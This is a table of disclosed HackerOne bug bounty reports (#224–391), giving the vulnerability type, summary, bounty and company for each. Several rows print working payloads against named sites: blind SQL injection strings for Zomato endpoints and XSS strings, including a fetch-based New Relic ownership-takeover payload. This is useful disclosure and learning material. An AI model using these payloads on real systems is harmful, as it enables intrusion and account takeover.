241 | 224 | Improper Authentication | Host (origin) checking in the Digits SDK passed an attacker-controlled string to a function expecting a regex, so regex metacharacters in the domain name bypassed the check ("." matching any character). The impact was account takeover. | $5040 | Twitter | https://hackerone.com/reports/129873
242 | 225 | CSRF | User token leak through the Referer header by abusing a chain of issues, due to an insufficient referrer policy. The URL was extracted by abusing an Open Redirect issue. The vulnerable endpoint was socialclub.rockstargames.com/crew/ | $750 | Rockstar Games | https://hackerone.com/reports/787160
243 | 226 | CSRF | Leaking user tokens through referer header by exploiting a chain of issues. The part handled in this report is Image injection leading to XSS on https://www.rockstargames.com/newswire/article | $750 | Rockstar Games | https://hackerone.com/reports/790465
244 | 227 | CSRF | Image injection on www.rockstargames.com/IV/screens/1280x720Image.html can be combined with other issues to leak user tokens. | $500 | Rockstar Games | https://hackerone.com/reports/784101
245 | 228 | Information disclosure | Image injection on https://www.rockstargames.com/careers#/offices/. Combined in a chain with other attacks could lead to leaking user tokens. | $500 | Rockstar Games | https://hackerone.com/reports/491654
246 | 229 | Insufficient Session Expiration | No session invalidation after logout. Attacker can reuse known tokens | $100 | Visma | https://hackerone.com/reports/808731
247 | 230 | Remote File Inclusion | Remote file inclusion through downloading file from chat. Uses path traversal to extract anywhere, and it can be hidden by setting a title for the file. | $5000 | Keybase | https://hackerone.com/reports/713006
248 | 231 | Insecure Design Principles | Using RTLO (Right to left override) character allows spoofing the URL that will be displayed when navigating out of rinkerboats.vanillacommunities.com leading to potential phishing / other attacks. | $150 | Vanilla | https://hackerone.com/reports/563268
249 | 232 | XSS | Stored XSS in the Customer Number field. | $250 | Visma | https://hackerone.com/reports/882189
250 | 233 | Information disclosure | CodeQL query to detect a J2EE server with directory listing enabled, which can disclose source code. | $1800 | Github Security Lab | https://hackerone.com/reports/909374
251 | 234 | XSS | XSS in account.mail.ru due to unsafe handling of a GET parameter (user-assisted, i.e. requires user interaction) | $1000 | Mail.ru | https://hackerone.com/reports/889874
252 | 235 | Information leak | MySQL credentials leaked to publicly available config file | $150 | Mail.ru | https://hackerone.com/reports/879389
253 | 236 | SSRF | SSRF through using the relap.io function allowing for fetching external resources, allowing access to the production network in a transparent manner. (Non-blind) | $1700 | Mail.ru | https://hackerone.com/reports/739962
254 | 237 | XSS | Stored XSS by authenticated user to all other users through the /wp-admin/edit.php?post\_type=forum endpoint | $225 | Wordpress | https://hackerone.com/reports/881918
255 | 238 | Information leak | A misconfigured web directory disclosed files that showed NordVPNs public proxy list and corresponding port numbers | $50 | NordVPN | https://hackerone.com/reports/791826
256 | 239 | Privilege Escalation | An attacker can kick out any other member of any organization, given that they know the membership ID of the user. This is due to an IDOR in the delete membership functionality, which can be triggered by: `DELETE /api/memberships/id` | $100 | Helium | https://hackerone.com/reports/810320
257 | 240 | XSS | Reflected XSS in certain endpoints allows account takeover. Attackers can also perform sensitive actions on behalf of authenticated users. | $594 | Ubiquiti Inc. | https://hackerone.com/reports/661647
258 | 241 | Command Injection | Certain end-points are vulnerable to command injection when using specifically crafted input, leading to RCE. This vulnerability can be triggered through other vulnerabilities, like XSS and CSRF. | $6839 | Ubiquiti Inc. | https://hackerone.com/reports/703659
259 | 242 | Logic bug | Bat files and other malicious executables (or any other filetypes and content) can be concealed as normal content, like .csv files by including illegal characters as content. | $1500 | Slack | https://hackerone.com/reports/833080
260 | 243 | XSS | XSS through unsafe URI handling in ASP.net on base starbucks.com domain | $500 | Starbucks | https://hackerone.com/reports/881115
261 | 244 | Bruteforce | User passwords can be brute forced due to lack of rate limiting | $700 | Twitter | https://hackerone.com/reports/854424
262 | 245 | Request Smuggling | console.helium.com is vulnerable to CL.TE request smuggling. | $500 | Helium | https://hackerone.com/reports/867952
263 | 246 | CSRF | CSRF allowing an attacker to import any novel to the victims chatstory (pixiv service) | $500 | Pixiv | https://hackerone.com/reports/534908
264 | 247 | Improper Authentication | 2FA bypass by omitting the 2FA code, likely due to a missing null/empty check. The vulnerable request is probably something like `"email":"attack@lol.com","2FA":""` | $1000 | Glassdoor | https://hackerone.com/reports/897385
265 | 248 | Logic Bug | Users are able to forge requests, allowing them to spawn additional units at will. This is done through (what looks like) a leaked secret and a lack of proper server-side validation. | $1100 | InnoGames | https://hackerone.com/reports/802636
266 | 249 | Open Redirect | Open redirect requiring user to click in order to work | $100 | LocalTapiola | https://hackerone.com/reports/194017
267 | 250 | Insecure design principles | CodeQL query to check for improper SSL certificates | $1800 | GitHub | https://hackerone.com/reports/917454
268 | 251 | Command injection | CodeQL query to detect OGNL injection | $2300 | Github | https://hackerone.com/reports/917455
269 | 252 | Use after free | A use-after-free exists in the IPv6 setsockopt path: it is possible to race and free the `struct ip6_pktopts` buffer (TOCTOU) while it is being handled by `ip6_setpktopt`. This struct contains pointers that can be used for R/W primitives in the kernel. Combining this vulnerability with a known WebKit issue allows for easy exploitation. | $10,000 | PlayStation | https://hackerone.com/reports/826026
270 | 253 | CSRF | `/community/create-post.js` was vulnerable to CSRF attacks, allowing an attacker to spam the community boards as other users. This attack was only possible through Chrome. | $150 | Rockstar Games | https://hackerone.com/reports/487378
271 | 254 | CSRF | `https://www.rockstargames.com/reddeadonline/feedback/submit.json` was vulnerable to CSRF attacks and could be exploited through a remote server. This attack was only possible through Chrome. | $150 | Rockstar Games | https://hackerone.com/reports/796295
272 | 255 | LFI | LFI of files with .md extension from `/var/www/dashboard/new/` was possible. In addition, remote file inclusion from github was possible due to the default value of `$docs_path`, leading to XSS. | $300 | TTS Bug Bounty | https://hackerone.com/reports/895972
273 | 256 | Logic Bug | Unlimited file upload in the image assigned to a contact leads to XSS by uploading malicious SVG. | $100 | Nextcloud | https://hackerone.com/reports/808287
274 | 257 | CRLF Injection | Malicious users (non-admins) can write to memcached when using a malicious URL as a share. | $100 | Nextcloud | https://hackerone.com/reports/592864
275 | 258 | HTTP Request Smuggling | CL.TE based request smuggling on api.zomato.com leading to account takeover among other issues. This issue was only reproducible when using the DELETE verb. As such, make sure to test for all HTTP verbs when checking for Request Smuggling | $5000 | Zomato | https://hackerone.com/reports/771666
276 | 259 | XSS | Reflected XSS on `https://www.tumblr.com/abuse/start?prefill=`. It only works on Firefox version 69 or lower. | $250 | Automattic | https://hackerone.com/reports/915756
277 | 260 | Logic Bug | CodeQL query to detect insecure use of postMessage. It checks if indexOf or startsWith is used to check MessageEvent.origin, which can lead to XSS or other issues. | $1800 | GitHub | https://hackerone.com/reports/920285
278 | 261 | DoS | DoS by sending many requests to apply for a certain job, due to relying on responses from a 3rd party server before returning. | $100 | Maximum | https://hackerone.com/reports/892615
279 | 262 | Session Fixation | Not all sessions were terminated when the password was reset. | $50 | Moneybird | https://hackerone.com/reports/743518
280 | 263 | Improper authentication | https://werkenbijderet.nl/vacature-alert endpoint did not have proper rate limiting implemented, leading to being able to send thousands of mails within 10 minutes. | $100 | Maximum | https://hackerone.com/reports/882942
281 | 264 | SSRF | Being able to call all internal classes, functions and parameters due to everything being declared public. This leads to blind SSRF through Gopher protocol. | $300 | TTS Bug Bounty | https://hackerone.com/reports/895696
282 | 265 | IDOR | Read only user can delete other users through IDOR | $50 | Helium | https://hackerone.com/reports/888729
283 | 266 | Brute Force | It is possible to brute force the login prompt of `app.mopub.com` due to only having IP based rate limiting. It should have CAPTCHA or block all access to the locked out account, not just add restrictions to the violating IP (as changing IPs is easy). | $420 | Twitter | https://hackerone.com/reports/819930
284 | 267 | XSS | Reflected XSS in GET parameter | $300 | Mail.ru | https://hackerone.com/reports/848742
285 | 268 | Improper access control | A partner's superuser account could access information of drivers belonging to other partners, including passport and drivers license data | $8000 | Mail.ru | https://hackerone.com/reports/863983
286 | 269 | Information leak | Bot Token for ICQ was leaked in GIT commit data for opensource JIRA plugin | $150 | Mail.ru | https://hackerone.com/reports/902064
287 | 270 | Logic bug | It was possible to create accounts with nicknames belonging to existing accounts | $150 | Mail.ru | https://hackerone.com/reports/824973
288 | 271 | XSS | Viewing a malicious SVG led to access to local files (LFI?) on certain iOS versions due to cross-application scripting in the Mail.ru iOS Mail app | $1000 | Mail.ru | https://hackerone.com/reports/900543
289 | 272 | Race Condition | Malicious applications could create multiple valid OAuth sessions by abusing a race condition. | $250 | Razer | https://hackerone.com/reports/699112
290 | 273 | IDOR | IDOR in the stocky application allows for changing columns of other users | $750 | Shopify | https://hackerone.com/reports/853130
291 | 274 | Account Takeover | If staff or the store owner has not yet registered a Google account with their Shopify ID, and you have privileges to change their registered email, you can take over the account by setting their email to your Gmail address. This also means you can take over accounts by having an admin be exposed to an XSS that performs this operation. It only works with Google Apps enabled. | $2000 | Shopify | https://hackerone.com/reports/892904
292 | 275 | Improper authentication | The Stocky application did not have any permission checks to download purchase orders, leading to anyone being able to download the orders. | $500 | Shopify | https://hackerone.com/reports/802286
293 | 276 | CRLF Injection | In the Synthetics "Ping" functionality, you can insert newline characters, resulting in almost full control over the email functionality. You are able to send emails to anyone, with any content. The only limitation is a small one in the "Subject" field. | $500 | New Relic | https://hackerone.com/reports/347439
294 | 277 | IDOR | The `selectAddressId` in the cookie combined with the `delivery_subzone` in the GET request, allows for unauthenticated enumeration of all addresses registered to users. This cannot be tied to a specific user. This is due to the backend disclosing the full, stored address of a user, given that the `delivery_subzone` matches that associated with the `selectAddressId` without any further authentication | $1500 | Zomato | https://hackerone.com/reports/514897
295 | 278 | Logic bug | Due to not sufficiently protecting which apps can retrieve the token in the authentication flow, it is possible for a malicious application to take over the account of the user. This requires a malicious app preinstalled on the victims device to be successful. | $500 | Shopify | https://hackerone.com/reports/855618
296 | 279 | Improper authentication | An attacker can generate app tokens through the `adminGenerateSession` mutation in the admin panel, as a staff member with no permissions. This would give access to a small subset of installed apps, limited to the current shop. | $2000 | Shopify | https://hackerone.com/reports/898528
297 | 280 | XSS | Stored XSS in admin interface through "evaluation of purchase process"-window | $1500 | Mail.ru | https://hackerone.com/reports/874387
298 | 281 | DoS | Certain files in /etc/ are writable, for example hosts, hostname and resolv.conf. While the last two seem to have special handling, /etc/hosts is inherently vulnerable. This leads to being able to DoS a service by writing large amounts of data to the file. | $1000 | Kubernetes | https://hackerone.com/reports/867699
299 | 282 | Logic bug | CodeQL query for finding incorrect hostname comparison. This is especially prevalent in Android applications. | $1500 | GitHub | https://hackerone.com/reports/929288
300 | 283 | Logic bug | Misconfiguration led to being able to get SmartDNS for free for longer than intended. | $700 | NordVPN | https://hackerone.com/reports/925757
301 | 284 | XXE | XXE on starbucks.com.sg/RestAPI/* leading to arbitrary file read | $500 | Starbucks | https://hackerone.com/reports/762251
302 | 285 | Account Takeover | Due to improper authentication when setting up 2FA, it is possible to take over an account given that you know the USER ID. This is not likely to leak, which reduces the impact of this vulnerability. | $100 | Helium | https://hackerone.com/reports/810880
303 | 286 | Information Disclosure | It was possible to view thumbnails of private videos through attacking the API | $750 | Pornhub | https://hackerone.com/reports/138703
304 | 287 | DoS | Improper handling of renaming HackerOne groups for managing access rights for programs, leads to excessive resource use which may lead to DoS | $2500 | HackerOne | https://hackerone.com/reports/880187
305 | 288 | DoS | DoS through recursive evaluation. Can be done remotely by an attacker with elevated privileges. | $200 | Kubernetes | https://hackerone.com/reports/882923
306 | 289 | Logic bug | By tampering with the request that selects which retailers you can earn cashback from, so that it contains an empty list, you can earn cashback from all retailers on the platform. Normally premium users can only select 6 and normal users can only select 3. The selection can normally only be set once, but using this vulnerability you can switch at any time. | $1000 | Curve | https://hackerone.com/reports/672487
307 | 290 | Use of weak PRNG | Grammarly Keyboard for Android used a weak PRNG, allowing a malicious app installed on the device to guess the PKCE code value and steal the user's OAuth access token. Fixed by changing to SecureRandom | $2000 | Grammarly | https://hackerone.com/reports/824931
308 | 291 | Improper Authentication | H1 SAML implementation allows for re-using SAML response for up to 10 minutes, allowing for increased risk in case an attacker can ever intercept or otherwise compromise such a request. | $500 | HackerOne | https://hackerone.com/reports/888930
309 | 292 | DoS | DoS of account (for Chrome) when viewing a tweet containing the link twitter.com/%00 | $560 | Twitter | https://hackerone.com/reports/921286
310 | 293 | IDOR | IDOR allows user to access pictures from other users, including EXIF data. | $200 | IRRCloud | https://hackerone.com/reports/906907
311 | 294 | Information leak | After the `policy_markdown_html` was added inside the team Graphql query, it was possible to enumerate if public programs also had private programs. In case they did, you could also see their internal policy. | $2500 | HackerOne | https://hackerone.com/reports/877642
312 | 295 | Phishing | Ability to spoof interface elements through adding tags or attributes in calendar events at calendar.mail.ru | $150 | Mail.ru | https://hackerone.com/reports/847473
313 | 296 | Code injection | CodeQL query for detecting possible template injections in Python | $2300 | Github | https://hackerone.com/reports/944359
314 | 297 | XSS | By adding a link in a post and manually editing out a portion (`denied:`), then reblogging the post, the XSS will execute after the victim clicks the link (on the reblogged post). | $350 | Automattic | https://hackerone.com/reports/882546
315 | 298 | Command Injection | Since GitLab allows for code injection through Mermaid, you can achieve arbitrary PUT requests in the context of the victim through this command injection. The victim has to have the required privilege to perform the action for the attack to succeed. | $3000 | Gitlab | https://hackerone.com/reports/824689
316 | 299 | SQLi | An SQL Injection existed in a Razer Gold asset due to using an outdated instance of PHPlist. The injection point is the _body parameter **name**_ and not the value! | $2000 | Razer | https://hackerone.com/reports/824307
317 | 300 | Code injection | Due to a vulnerability in how the executable launched related executables, it was possible to escalate privileges by abusing this issue. (Likely similar to DLL injection or unquoted path issues.) The issue was in a Cortex related service. | $750 | Razer | https://hackerone.com/reports/769684
318 | 301 | IDOR | An alternate site shared database and cookie credentials with `card.starbucks.com.sg`. By exploiting the alternate site, the hacker could copy over the cookie value and take over the account on starbucks. | $6000 | Starbucks | https://hackerone.com/reports/876300
319 | 302 | Command injection | AWS S3 bucket takeover of multiple buckets. The buckets were still referenced in a test script and as such could have resulted in RCE. | $12,500 | Mapbox | https://hackerone.com/reports/329689
320 | 303 | CSRF | Login CSRF via OAuth code in `lootdog.io` allows an attacker to replace a user's session with the attacker's session. | $150 | Mail.ru | https://hackerone.com/reports/892986
321 | 304 | DoS | Due to relying on AJV, and also using `allErrors:true`, Fastify is vulnerable to DoS when there is potentially slow matching patterns or if `uniqueItems` is in the schema. | $250 | Node.js third-party modules | https://hackerone.com/reports/903521
322 | 305 | DoS | By submitting a very long password, the hashing algorithm on the server will take a lot of resources and potentially result in DoS due to memory exhaustion. | $100 | Nextcloud | https://hackerone.com/reports/840598
323 | 306 | Information Disclosure | Due to lack of access control in `ajaxgetachievementsforgame`, it is possible to see achievement names, display names and descriptions for unreleased games if you find a user who has the achievements for those unreleased apps (beta tester or similar) | $750 | Valve | https://hackerone.com/reports/835087
324 | 307 | Open Redirect | Reverse tabnabbing (changing the location of the original page when opening a link in a new tab) was possible in the functionality for printing source document images. | $100 | Visma Public | https://hackerone.com/reports/911123
325 | 308 | Client side enforcement of Server-side Security | Due to silently ignoring the content length header, it is possible to bypass the size check for S3 buckets and upload attachments of any size. The solution is to add `content-length` header to whitelisted headers. | $500 | Ruby on Rails | https://hackerone.com/reports/789579
326 | 309 | Logic bug | When creating a hash, the permit function does not sufficiently protect when converting using `.each()`, allowing for sneaking in additional parameters that should not logically be present | $500 | Ruby on Rails | https://hackerone.com/reports/292797
327 | 310 | Null pointer dereference | A lack of proper checks for user supplied data results in a null pointer dereference. | $1500 | Open-Xchange | https://hackerone.com/reports/827729
328 | 311 | Use After Free | Due to incorrectly decreasing a reference counter, by sending a lot of newline characters ("\n") you can reach code checking the `cmd`-variable which has previously been freed. | $500 | Open-Xchange | https://hackerone.com/reports/827051
329 | 312 | IDOR | Account takeover through IDOR in password recovery procedure | $1500 | Mail.ru | https://hackerone.com/reports/843160
330 | 313 | IDOR | Could disclose attributes of arbitrary sites due to an IDOR in `relap.io` | $750 | Mail.ru | https://hackerone.com/reports/749887
331 | 314 | XSS | By uploading a PNG with JS and XML code, and adding it to a Wiki page, it was possible to achieve stored XSS | $1500 | GitLab | https://hackerone.com/reports/880099
332 | 315 | Improper Access Control | Lack of access control on the `ListMembers` query allowed for enumeration of members in private lists. Finding the TwitterID is difficult, but can be done by brute force by attacking different endpoints. To further show impact, it was demonstrated that `x-response-time` header discloses if the lists exists or not. | $2940 | Twitter | https://hackerone.com/reports/885539
333 | 316 | XSS | Stored XSS through the blob-viewer. The payload is in the description field. | $2000 | GitLab | https://hackerone.com/reports/806571
334 | 317 | SSRF | Chaining redirects in Grafana allows for SSRF using any HTTP verb to any arbitrary endpoint. For more information, see Rhynorater's talk at HacktivityCon 2020. | $12,000 | GitLab | https://hackerone.com/reports/878779
335 | 318 | Logic bug | By supplying an attacker controlled link, the attacker can get a copy of the PoC, if the victim (person creating a poc) submits the details on the page. There were multiple bypasses possible due to a loosely configured regex, which was fixed. | $1000 | BugPoc | https://hackerone.com/reports/926221
336 | 319 | Logic bug | Due to lack of association checks between 3rd party wallet IDs and user IDs, it was possible to purchase Zomato Gold memberships using other user's 3rd party wallets, effectively having them pay for it. | $2000 | Zomato | https://hackerone.com/reports/938021
337 | 320 | Logic bug | Ability to decrease the payment by at most 1 currency unit (0.99) for any purchase | $150 | Zomato | https://hackerone.com/reports/927661
338 | 321 | Improper access control | Access control issue due to not correctly checking permissions in the active session for the user | $100 | Visma Public | https://hackerone.com/reports/812143
339 | 322 | Information leak | Ability to see error message related to character encoding from SQL operation by adding the poop-emoji to the email field during registration | $100 | Unikrn | https://hackerone.com/reports/866271
340 | 323 | SQL Injection | SOLR injection through adding `\` to the query. | $100 | Zomato | https://hackerone.com/reports/844428
341 | 324 | SQL Injection | Blind SQLi in `res_id` of `/php/geto2banner`. PoC is `res_id=51-CASE/**/WHEN(LENGTH(version())=10)THEN(SLEEP(6*1))END&city_id=0` | $2000 | Zomato | https://hackerone.com/reports/838855
342 | 325 | SQL Injection | Same as #324, but on a different endpoint: `/php/widgets_handler.php`. PoC: `:/php/widgets_handler.php?method=getResWidgetButton&res_id=51-CASE/**/WHEN(LENGTH(version())=10)THEN(SLEEP(6*1))END` | $2000 | Zomato | https://hackerone.com/reports/836079
343 | 326 | Improper access control | The food.grammarly.io site uses the Meteor framework and lacked proper authorization on sensitive endpoints. The attacker could leak user data and employee data, including access tokens, by calling the server methods directly from JS (for example in dev tools) | $1000 | Grammarly | https://hackerone.com/reports/745495
344 | 327 | SQL Injection | The reporter identified a SOLR injection on the `user_id` parameter at `:/v2/leaderboard_v2.json`. This had low impact, but the internal team found a boolean based blind SQLi in the same codebase when investigating and rewarded the report as such. | $2000 | Zomato | https://hackerone.com/reports/952501
345 | 328 | Special element injection | SOLR injection similar to #323 and #327, but on a different endpoint. PoC `:v2/red/homepage.json?lat=&lon=&city_id={!dismax+df=city_id}86&android_country=US&lang=en&android_language=en` | $150 | Zomato | https://hackerone.com/reports/953203
346 | 329 | Missing authorization | Missing authorization checks allowed a user who was only permitted to do sales to record payments they were not supposed to | $250 | Visma Public | https://hackerone.com/reports/919008
347 | 330 | SSRF | CodeQL query for detecting SSRF issues in Golang libraries and code | $1800 | Github Security lab | https://hackerone.com/reports/956296
348 | 331 | LDAP Injection | CodeQL query for detecting LDAP injections in Java, supporting Java JNDI, UnboundID, Spring LDAP and Apache LDAP API | $2500 | Github Security lab | https://hackerone.com/reports/956295
349 | 332 | XSS | Stored XSS through the chartbuilder in `one.newrelic.com`. Payload: `SELECT '“> "' Style=position\' FROM SyntheticCheck` | $2500 | New Relic | https://hackerone.com/reports/634692
350 | 333 | Information leak | Able to view full name of users who are not yet part of your account. This can be achieved by creating a note, viewing it and trying to share it with the invited account. | $750 | New Relic | https://hackerone.com/reports/476958
351 | 334 | Privilege escalation | Restricted users are able to delete Key transaction tags through the GUI even though they should only have READ-access. | $750 | New Relic | https://hackerone.com/reports/638685
352 | 335 | Privilege escalation | An unrestricted user is able to view the application token for a mobile app by directly visiting the `/deploy` endpoint for the app. | $500 | New Relic | https://hackerone.com/reports/479139
353 | 336 | IDOR | Access to a subset of a victims Insights Dashboards through a GraphQL query with insufficient validation | $1500 | New Relic | https://hackerone.com/reports/765565
354 | 337 | Logic bug | Ability to buy PRO subscriptions at reduced prices by tampering with the per-unit price | $203.5 | New Relic | https://hackerone.com/reports/783688
355 | 338 | Improper access control | Restricted users are able to delete NerdStorage documents created/owned by any user on that account, through GraphQL query. | $600 | New Relic | https://hackerone.com/reports/766145
356 | 339 | Improper access control | A restricted user was able to update the Apdex target for an application by abusing a GraphQL mutation without proper validation and authorization | $626 | New Relic | https://hackerone.com/reports/776449
357 | 340 | Violation of secure design principles | It was not possible to delete API keys in the application, even though the GUI said it was possible and the action succeeded. This was true even for users with an Admin/Owner role. | $500 | New Relic | https://hackerone.com/reports/782703
358 | 341 | Code injection | By abusing a CSRF vulnerability in the admin panel, the reporters were able to achieve stored XSS. Using the stored XSS, they then escalated the vulnerability to RCE. The attack required social engineering of a WordPress admin (to click the initial link) to be successful. | $506 | New Relic | https://hackerone.com/reports/941421
359 | 342 | Improper access control | The reporter found a test endpoint for Synthetics monitors. It did not validate the permissions of the user, allowing low-privileged users to create monitors using Secure Credentials | $500 | New Relic | https://hackerone.com/reports/788499
360 | 343 | IDOR | The reporter found a way to link an account with any Partnership as long as the ID was known. It was resolved by adding proper validation. | $695 | New Relic | https://hackerone.com/reports/786109
361 | 344 | XSS | Stored XSS in the Synthetics private locations list. Both the Label and Description fields were vulnerable. PoC: `` | $2500 | New Relic | https://hackerone.com/reports/680240
362 | 345 | Improper access control | Restricted users are able to create, edit and remove tags from the NerdGraph entities. | $750 | New Relic | https://hackerone.com/reports/757957
363 | 346 | XSS | Stored XSS in the "Position" field when applying for "Support/Moderator" jobs at recruit.innogames.de | $500 | Innogames | https://hackerone.com/reports/917250
364 | 347 | IDOR | An endpoint for testing Synthetics monitors without proper validation allowed monitors from other accounts to be run on your account, given that the attacker knew the monitor's ID (on the victim's account) | $2500 | New Relic | https://hackerone.com/reports/787886
365 | 348 | XSS | Stored XSS across accounts through the embedded charts page. The vulnerable field is `chart_title` and the PoC is: ``. Multiple bypasses were also found for this issue | $3625 | New Relic | https://hackerone.com/reports/709883
366 | 349 | XSS | Stored XSS in the transactionName field of the Beta map functionality. PoC is a simple `"-alert(document.domain)-"` | $2500 | New Relic | https://hackerone.com/reports/667770
367 | 350 | XSS | Cross-account stored XSS by injecting the payload into a chart when it is displayed inside a note. The exploit abuses the `href` attribute by using a `javascript:alert()"` payload. This XSS requires no user interaction. | $4250 | New Relic | https://hackerone.com/reports/507132
368 | 351 | Improper access control | There was a misconfiguration in the CORS policy where all assets trusted the domain `nr3.nr-assets.net`, to which users can upload arbitrary content (for example Nerdlet artifacts). This allows an attacker to upload malicious files of arbitrary types and execute arbitrary actions on behalf of the victim in various ways due to the incorrect configuration. Valid fixes are either to move user content to another sandbox domain or to amend the CORS policy. | $3125 | New Relic | https://hackerone.com/reports/751699
369 | 352 | Information disclosure | CORS misconfiguration allows requests from the sandbox containing user apps, leading to potential disclosure of nerdpacks, nerdlets and launcher IDs, as well as the source code of the victim's app. | $625 | New Relic | https://hackerone.com/reports/746786
370 | 353 | XSS | Stored XSS in admin interface when creating a new alert. By formatting the URL as `user:password@domain.com` the server accepts the payload, which is: `javascript:fetch("https://rpm.newrelic.com/user_management/accounts/{ACCOUNT_ID}/update_primary_admin?value={ATTACKER_ID}",{method:"PUT",headers:{"X-Requested-With":"XMLHttpRequest"}}).then(function(_){alert("you_have_lost_your_ownership");close()})//@asd.com` | $1337 | New Relic | https://hackerone.com/reports/605845
371 | 354 | Memory Corruption | Exploit mitigation best practices such as ASLR (Address Space Layout Randomization), DEP (Data Execution Prevention) and CFG (Control Flow Guard) were not enabled | $50 | Nextcloud | https://hackerone.com/reports/380102
372 | 355 | DoS | Denial of service by poisoning the cache with an invalid CORS header, due to an endpoint echoing back the supplied "origin" value in the CORS `Allow-Origin` header. | $200 | Automattic | https://hackerone.com/reports/921704
373 | 356 | XSS | When connecting to an invalid website, it launches a pop-up which can contain attacker-controlled content. By using the file: scheme, for example, you can trick users into launching arbitrary files on the local machine | $100 | Nextcloud | https://hackerone.com/reports/685552
374 | 357 | Path Traversal | The Linux client is vulnerable to an attack where an administrator can inject path traversal payloads (../) into filenames in order to write files to arbitrary locations within the control of the Nextcloud app on the victim's machine. It only allows creating new files, not modifying existing ones, and needs to be continuously exploited to have an effect. | $250 | Nextcloud | https://hackerone.com/reports/590319
375 | 358 | SSRF | SSRF in PlantUML staging server, due to accepting the `!include` function. | $100 | GitLab | https://hackerone.com/reports/689245
376 | 359 | XSS | Stored XSS due to improper filtering of attributes after admin has edited them. | $650 | WordPress | https://hackerone.com/reports/633231
377 | 360 | XSS | Stored XSS due to improper filtering of attributes after admin has edited them. Different case from #359 | $650 | WordPress | https://hackerone.com/reports/497724
378 | 361 | XSS | Stored XSS in First and Last Name field for "Staff" account | $3000 | Shopify | https://hackerone.com/reports/948929
379 | 362 | Privilege Escalation | An attacker can register an account with an email, get permissions and then be deleted. After being deleted, by accessing `accounts.shopify.com` with the now-deleted account, they still have access. | $1000 | Shopify | https://hackerone.com/reports/870001
380 | 363 | Information disclosure | A bug in GraphQL access control allowed an attacker with "customer" permissions to leak additional data from orders that they should not have access to. | $1500 | Shopify | https://hackerone.com/reports/882412
381 | 364 | Information disclosure | By first getting an API key, then querying for specific data, staff members can access data they are not supposed to have access to. | $1000 | Shopify | https://hackerone.com/reports/901775
382 | 365 | Information disclosure | Users without any permission can access certain store information through a GraphQL query. | $500 | Shopify | https://hackerone.com/reports/409973
383 | 366 | XSS | Reflected XSS through the `skuNo` & `skuImgUrl` parameters at `https://www.istarbucks.co.kr/app/getGiftStock.do` | $250 | Starbucks | https://hackerone.com/reports/768345
384 | 367 | Improper access control | Password reset link can be used to reset password multiple times. | $500 | Shopify | https://hackerone.com/reports/898841
385 | 368 | IDOR | The last 4 digits of a registered credit card could be obtained through error messages on the `/profile_payment/save` endpoint by abusing an IDOR | $500 | Yelp | https://hackerone.com/reports/361984
386 | 369 | IDOR | An IDOR allowed an attacker to order food on GrubHub using someone else's credit card on the `/checkout/transaction_platform` endpoint. | $2500 | Yelp | https://hackerone.com/reports/391092
387 | 370 | IDOR | An IDOR on the `/rewards/signup` endpoint allowed an attacker to associate a random credit card with their account. While it could not be used, it allowed viewing the transaction history and cash back amounts received | $2000 | Yelp | https://hackerone.com/reports/358143
388 | 371 | Stack overflow | Half-Life 1 allows taking arguments from the command line to launch a mod/specific game. This is done through `-game `. The argument is copied using strcopy, making an overflow possible. | $1150 | Valve | https://hackerone.com/reports/832750
389 | 372 | Buffer Overflow | By loading a malicious map file (.bsp), an attacker can achieve RCE on any victim who loads the map. This works on any GoldSrc game. | $450 | Valve | https://hackerone.com/reports/763403
390 | 373 | Buffer Overflow | The `spk` console command has no length check before copying its argument into a stack-based buffer, making RCE possible by having a victim load a malicious .cfg file. | $350 | Valve | https://hackerone.com/reports/769014
391 | 374 | IDOR | An IDOR when creating shipping labels allows an attacker to request print labels (and I assume see the information related to the order) for stores he does not have access to. | $1000 | Shopify | https://hackerone.com/reports/884159
392 | 375 | Improper authentication | The `getLoginStatus` call in Digits allows an attacker to retrieve OAuth Credentials for any account, due to improperly verifying domains by utilizing the referer header. If this header was empty, the application considered the request valid, which was the issue. | $5040 | Twitter | https://hackerone.com/reports/168116
393 | 376 | Information disclosure | CodeQL query to detect logging of potentially sensitive information in JS based applications | $1800 | Github Security Lab | https://hackerone.com/reports/963816
394 | 377 | Information disclosure | CodeQL query to detect basic authentication over HTTP in java.net and Apache HttpClient libraries. This is vulnerable due to basic auth only using base64 encoding and being easily reversible. | $2300 | Github Security Lab | https://hackerone.com/reports/963815
395 | 378 | DoS | Lodash v4.17.15 was vulnerable to prototype pollution, allowing for potential DoS. | $250 | NodeJS 3rd party modules | https://hackerone.com/reports/864701
396 | 379 | Privacy Violation | Clickjacking was possible during the payment process, leading to an attacker being able to trick the victim into paying for items using their stored credit card. | $400 | Yelp | https://hackerone.com/reports/391385
397 | 380 | UI Redressing (Clickjacking) | Multiple endpoints were vulnerable to clickjacking. | $500 | Yelp | https://hackerone.com/reports/305128
398 | 381 | UI Redressing (Clickjacking) | Clickjacking was possible on the `/reservations` endpoint, possibly allowing an attacker to leak a victim's information or cause monetary loss for the victim | $500 | Yelp | https://hackerone.com/reports/355859
399 | 382 | Information disclosure | It is possible to disclose all details about all pentesters invited to a test, regardless of whether they accepted or not. This allows leaking sensitive information. | $500 | HackerOne | https://hackerone.com/reports/958374
400 | 383 | XSS | Stored XSS through the dashboard builder within New Relic One. | $2500 | New Relic | https://hackerone.com/reports/626082
401 | 384 | Privilege Escalation | Synthetics did not enforce the same permissions as other functionality, allowing users to have higher privileges than intended. | $750 | New Relic | https://hackerone.com/reports/387290
402 | 385 | Privilege Escalation | After the switch to Zuora for managing customer subscriptions, members who do not have such access through the New Relic platform can access the information through the Zuora API. | $900 | New Relic | https://hackerone.com/reports/501672
403 | 386 | XSS | Stored XSS via role name in JSON chart, which was part of a prerelease UI. Payload was: `/*\"\x3e` | $2500 | New Relic | https://hackerone.com/reports/520630
404 | 387 | Improper authentication | Restricted users were able to delete filter sets used by admin users at `https://infrastructure.newrelic.com/accounts/{{ACC#}}/settings/filterSets` | $250 | New Relic | https://hackerone.com/reports/202501
405 | 388 | Privilege escalation | By being invited as a staff member and becoming a partner, then revoking said permission, the previous account still has access to the partner store (? Hard to understand from report) | $1500 | Shopify | https://hackerone.com/reports/911857
406 | 389 | XSS | It is possible to achieve stored XSS when creating a menu item. The XSS fires when you try to delete said item. | $1000 | Shopify | https://hackerone.com/reports/887879
407 | 390 | Information disclosure | Staff members with No Permission could not access data through the web, but by using the Android application the member could access Order Details via the `exchangeReceiptSend` call | $1000 | Shopify | https://hackerone.com/reports/917875
408 | 391 | Privilege escalation | A malicious admin can create additional admin accounts without other admins being notified or able to see them. | $500 | Shopify | https://hackerone.com/reports/962895
